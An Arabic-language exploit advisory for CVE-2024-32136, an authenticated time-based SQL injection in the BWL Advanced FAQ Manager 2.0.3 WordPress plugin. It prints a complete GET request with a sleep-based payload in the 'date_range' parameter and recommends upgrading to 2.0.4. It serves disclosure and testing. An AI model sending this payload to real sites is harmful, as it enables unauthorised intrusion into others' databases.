
إثبات المفهوم لاستغلال CVE-2024-32136، وهو حقن SQL بعد تسجيل الدخول في BWL Advanced FAQ Manager 2.0.3، يوضح التلاعب بقاعدة البيانات عبر الزمن باستخدام الوسيط 'date_range'.
عنوان الثغرة: BWL Advanced FAQ Manager 2.0.3 - حقن SQL بعد المصادقة
التاريخ: 14 أبريل 2024
مؤلف الثغرة: Ivan Spiridonov (xbz0n)
رابط البرنامج: https://codecanyon.net/item/bwl-advanced-faq-manager/5007135
الإصدار: 2.0.3
تم الاختبار على: Ubuntu 20.04
CVE: CVE-2024-32136
حقن SQL هو نوع من الثغرات الأمنية التي تسمح للمهاجم بالتدخل في استعلامات قاعدة بيانات التطبيق. عادةً ما يتضمن إدراج أو "حقن" استعلام SQL عبر بيانات الإدخال من العميل إلى التطبيق. يمكن لاستغلال ناجح لحقن SQL قراءة بيانات حساسة من قاعدة البيانات، وتعديل بيانات قاعدة البيانات (إدراج/تحديث/حذف)، وتنفيذ عمليات إدارية على قاعدة البيانات (مثل إيقاف تشغيل نظام إدارة قواعد البيانات)، واستعادة محتوى ملف معين موجود على نظام ملفات DBMS، وفي بعض الحالات، إصدار أوامر لنظام التشغيل.
توجد الثغرة داخل المعامل 'date_range' المستخدم في صفحة 'bwl-advanced-faq-analytics' من ملحق BWL Advanced FAQ Manager. يمكن للمهاجمين الموثقين تنفيذ أوامر SQL عشوائية داخل قاعدة البيانات عن طريق معالجة الإدخال لهذا المعامل.
يُظهر طلب GET التالي الثغرة:
GET /wp-admin/edit.php?page=bwl-advanced-faq-analytics&post_type=bwl_advanced_faq&filter_type=views&date_range=(select*from(select(sleep(20)))a)&faq_id=all HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://localhost/wp-admin/edit.php?post_type=bwl_advanced_faq&page=bwl-advanced-faq-analytics
Connection: close
Cookie: [ملفات تعريف الارتباط ذات الصلة]
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
إذا تأخر استجابة الخادم لمدة 20 ثانية تقريبًا، فهذا يشير إلى استغلال ناجح لحقن SQL الزمني، مما يؤكد وجود الثغرة.
يُنصح مستخدمو BWL Advanced FAQ Manager v2.0.3 بتحديث الملحق إلى الإصدار المُصحح v2.0.4.